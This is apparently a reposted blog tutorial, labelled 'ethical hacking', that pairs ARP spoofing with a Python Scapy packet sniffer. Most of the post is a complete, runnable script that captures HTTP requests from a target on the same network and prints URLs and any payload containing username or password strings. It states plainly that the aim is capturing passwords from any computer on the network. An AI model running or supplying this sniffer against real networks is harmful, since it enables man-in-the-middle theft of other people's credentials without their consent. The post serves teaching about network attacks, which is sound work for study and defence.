Python Ethical Hacking - Packet Sniffer(2)

时间：2019-09-01 10:33:09 阅读：91 评论：0 收藏：0 [点我收藏+]

Capturing passwords from any computer connected to the same network.

ARP_SPOOF + PACKET_SNIFFER

Target a computer on the same network.
arp_spoof to redirect the flow of packets(become MITM)
Packet_sniffer to see URLs, usernames, and passwords sent by the target.

#!/usr/bin/env python

from scapy.all import *
from scapy.layers.http import *


def sniff(interface):
    scapy.all.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def get_url(packet):
    return packet[HTTPRequest].Host.decode(errors=‘ignore‘) + packet[HTTPRequest].Path.decode(errors=‘ignore‘)


def get_login_info(packet):
    if packet.haslayer(scapy.all.Raw):
        load = packet[scapy.all.Raw].load.decode(errors=‘ignore‘)
        keywords = ["username", "user", "login", "password", "pass"]
        for keyword in keywords:
            if keyword in load:
                return load


def process_sniffed_packet(packet):
    if packet.haslayer(HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request >> " + url)

        login_info = get_login_info(packet)
        if login_info:
            print("\n\n[+] Possible username/password > " + login_info + "\n\n")


sniff("eth0")

技术分享图片

Python Ethical Hacking - Packet Sniffer(2)

原文：https://www.cnblogs.com/keepmoving1113/p/11441145.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)